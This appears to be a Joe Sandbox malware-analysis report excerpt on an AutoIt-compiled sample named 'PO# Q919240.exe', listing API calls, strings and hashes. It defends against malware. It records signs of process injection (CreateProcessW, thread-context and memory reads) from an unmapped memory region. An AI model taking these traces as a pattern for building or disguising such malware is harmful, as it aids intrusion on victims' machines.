                • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                • Instruction Fuzzy Hash: 24A12B74E10209EBDB14DFA4C994BEEB7B5FF48305F208159E546BB280D775AA80CF58

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1219 4102b0-4102c5 SHGetMalloc 1220 4102cb-4102da SHGetDesktopFolder 1219->1220 1221 425dfd-425e0e call 433244 1219->1221 1222 4102e0-41031a call 412fba 1220->1222 1223 41036b-410379 1220->1223 1231 410360-410368 1222->1231 1232 41031c-410331 SHGetPathFromIDListW 1222->1232 1223->1221 1229 41037f-410384 1223->1229 1231->1223 1233 410351-41035d 1232->1233 1234 410333-41034a call 412fba 1232->1234 1233->1231 1234->1233
                APIs
                • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                • _wcsncpy.LIBCMT ref: 004102ED
                • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                • _wcsncpy.LIBCMT ref: 00410340
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                • String ID: C:\Users\user\Desktop\PO# Q919240.exe
                • API String ID: 3170942423-1484967488
                • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1237 40e4c0-40e4e5 call 403350 RegOpenKeyExW 1240 427190-4271ae RegQueryValueExW 1237->1240 1241 40e4eb-40e4f0 1237->1241 1242 4271b0-4271f5 call 4115d7 call 43652f RegQueryValueExW 1240->1242 1243 42721a-42722a RegCloseKey 1240->1243 1248 427210-427219 call 436508 1242->1248 1249 4271f7-42720e call 402160 1242->1249 1248->1243 1249->1248
                APIs
                • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: QueryValue$CloseOpen
                • String ID: Include$Software\AutoIt v3\AutoIt
                • API String ID: 1586453840-614718249
                • Opcode ID: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
                • Opcode Fuzzy Hash: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1254 410570-4105f1 CreateWindowExW * 2 ShowWindow * 2
                APIs
                • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                • ShowWindow.USER32(?,00000000), ref: 004105E4
                • ShowWindow.USER32(?,00000000), ref: 004105EE
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Window$CreateShow
                • String ID: AutoIt v3$edit
                • API String ID: 1584632944-3779509399
                • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
                • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C
                APIs
                  • Part of subcall function 04264300: Sleep.KERNELBASE(000001F4), ref: 04264311
                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0426453E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1467809739.0000000004262000.00000040.00000020.00020000.00000000.sdmp, Offset: 04262000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4262000_PO# Q919240.jbxd
                Similarity
                • API ID: CreateFileSleep
                • String ID: 8JO09KWU1X1ZHK5WP8MJBAXULW
                • API String ID: 2694422964-2282072137
                • Opcode ID: 4d04371689ea0721e7abc73f719e28f6ea2bcaa91187400a9ddb383549c0da5b
                • Instruction ID: e12444c3f64bff35331e4fbb6fec0c844a786ec38580a095543537c0dbe39ad3
                • Opcode Fuzzy Hash: 4d04371689ea0721e7abc73f719e28f6ea2bcaa91187400a9ddb383549c0da5b
                • Instruction Fuzzy Hash: 9E51B631E14288DAEF11DBF4C814BDEBB799F15304F004189E6497B2C1CBB91B89CBA6
                APIs
                • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                • RegCloseKey.KERNELBASE(?), ref: 0040F2B5
                • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Close$OpenQueryValue
                • String ID: Control Panel\Mouse
                • API String ID: 1607946009-824357125
                • Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                • Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
                • Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                • Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
                APIs
                • CreateProcessW.KERNELBASE(?,00000000), ref: 04263ABB
                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 04263B51
                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 04263B73
                Memory Dump Source
                • Source File: 00000000.00000002.1467809739.0000000004262000.00000040.00000020.00020000.00000000.sdmp, Offset: 04262000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4262000_PO# Q919240.jbxd
                Similarity
                • API ID: Process$ContextCreateMemoryReadThreadWow64
                • String ID:
                • API String ID: 2438371351-0
                • Opcode ID: e3f14b9100784c2d13b4d96e4da997e342e741b63af52aad6d222721779d43e7
                • Instruction ID: 87238e885dedfad9e7fb03a5bd6adcac9d5f1eb8b8de55c2d80b87fae6b8611b
                • Opcode Fuzzy Hash: e3f14b9100784c2d13b4d96e4da997e342e741b63af52aad6d222721779d43e7
                • Instruction Fuzzy Hash: EA620B30A24258DBEB24DFA4C850BDEB376EF58300F1091A9D50DEB394E775AE81CB59
                APIs
                  • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
                • _free.LIBCMT ref: 004295A0
                  • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                  • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                  • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                  • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                  • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                  • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                • String ID: >>>AUTOIT SCRIPT<<<$C:\Users\user\Desktop\PO# Q919240.exe
                • API String ID: 3938964917-31329374
                • Opcode ID: 54ef76e4734de236163cd7b280f05d5101af8392224d903fd41af02c4ea86240
                • Instruction ID: c8289cc7cde30cfde4dff3f83c8481f20f860a5b07fa540731426c520eca24fb
                • Opcode Fuzzy Hash: 54ef76e4734de236163cd7b280f05d5101af8392224d903fd41af02c4ea86240
                • Instruction Fuzzy Hash: 9A919171A00219ABCF04EFA5D8819EE7774BF48314F50452EF915B7391D778EA06CBA8
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: _memmove
                • String ID: Error:
                • API String ID: 4104443479-232661952
                • Opcode ID: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                • Instruction ID: 2c658176ab693071ca67d4d31bd2fe4acf4d59654e7b744331f3a235cb1e2e29
                • Opcode Fuzzy Hash: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                • Instruction Fuzzy Hash: 0D3191716006059FC324DF29C881AA7B3E6EF84314B24853FE95AC7791EB79E941CBD8
                APIs
                • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                  • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\PO# Q919240.exe,0040F545,C:\Users\user\Desktop\PO# Q919240.exe,004A90E8,C:\Users\user\Desktop\PO# Q919240.exe,?,0040F545), ref: 0041013C
                  • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                  • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                  • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                  • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                  • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                  • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
                • String ID: X$pWH
                • API String ID: 85490731-941433119
                • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
                • Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
                APIs
                • _wcslen.LIBCMT ref: 00401B11
                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                • _memmove.LIBCMT ref: 00401B57
                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                • String ID: @EXITCODE
                • API String ID: 2734553683-3436989551
                • Opcode ID: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                • Instruction ID: 16ac7666fc6b8d0cd4c8082de1062d74cbdf630d8e5b0a9ec9a55ac2b86b5c72
                • Opcode Fuzzy Hash: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                • Instruction Fuzzy Hash: D5F0CDF2B00641AFD720DB36DC02B6775E49B84308F04883EA24BC6795FA7DE4828B14
                Strings
                • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                • C:\Users\user\Desktop\PO# Q919240.exe, xrefs: 00410107
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: _strcat
                • String ID: >>>AUTOIT NO CMDEXECUTE<<<$C:\Users\user\Desktop\PO# Q919240.exe
                • API String ID: 1765576173-230720181
                • Opcode ID: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                • Instruction ID: e645463cc19bd0c1a49bcabea2d674544a6c2f3c5714d62cb3526a870e150300
                • Opcode Fuzzy Hash: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                • Instruction Fuzzy Hash: FBF090B390020D768B00F6E6D942CEFB37C9985704B5006AFA905B3152EA79EA0987B6
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                • Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
                • Opcode Fuzzy Hash: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                • Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: __filbuf__getptd_noexit__read_memcpy_s
                • String ID:
                • API String ID: 1794320848-0
                • Opcode ID: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                • Instruction ID: 2f36134af58cf06217a4581a57f76d3547d7b7b98d7afe96428f3577b7504850
                • Opcode Fuzzy Hash: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                • Instruction Fuzzy Hash: 6C51E631A01208DBCB249F69C9446DFB7B1AFC0364F25826BE43597290E378EED1CB59
                APIs
                • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
                • TerminateProcess.KERNEL32(00000000), ref: 004753CE
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Process$CurrentTerminate
                • String ID:
                • API String ID: 2429186680-0
                • Opcode ID: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                • Instruction ID: dddcdfafc98398d1c0f0a19edd80e49036cf45bbfca44c020541658de01b6296
                • Opcode Fuzzy Hash: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                • Instruction Fuzzy Hash: 2C519D71604301AFC710DF65C881BABB7E5EF88308F14891EF9598B382D7B9D945CB96
                APIs
                • _malloc.LIBCMT ref: 0043214B
                  • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                  • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                  • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                • _malloc.LIBCMT ref: 0043215D
                • _malloc.LIBCMT ref: 0043216F
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: _malloc$AllocateHeap
                • String ID:
                • API String ID: 680241177-0
                • Opcode ID: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                • Instruction ID: dac51259f70ca5acf95ac1b1a30df86389447b5c3122b5fc7e5239b6c816f1c7
                • Opcode Fuzzy Hash: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                • Instruction Fuzzy Hash: A0F0E273200B142AD2206A6A6DC1BE7B39ADBD4765F00403FFB058A206DAE9988542EC
                APIs
                • __wsplitpath.LIBCMT ref: 004678F7
                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                • GetLastError.KERNEL32(00000000,00000000), ref: 004679C7
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                 • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: ErrorLast__wsplitpath_malloc
                • String ID:
                • API String ID: 4163294574-0
                • Opcode ID: b7e2b2e067b321cb14cd8dd870a284e502ce9d37bff932640fd458450c7e1011
                • Instruction ID: 5ded281afda408fdcd401bf2365ceabb828b89a129c607e264fb1023d06c7d2e
                • Opcode Fuzzy Hash: b7e2b2e067b321cb14cd8dd870a284e502ce9d37bff932640fd458450c7e1011
                • Instruction Fuzzy Hash: FB5126712083018BD710EF75C881A5BB3E5AF84318F044A6EF9559B381EB39ED09CB97
                APIs
                  • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
                  • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
                  • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
                • _strcat.LIBCMT ref: 0040F786
                  • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
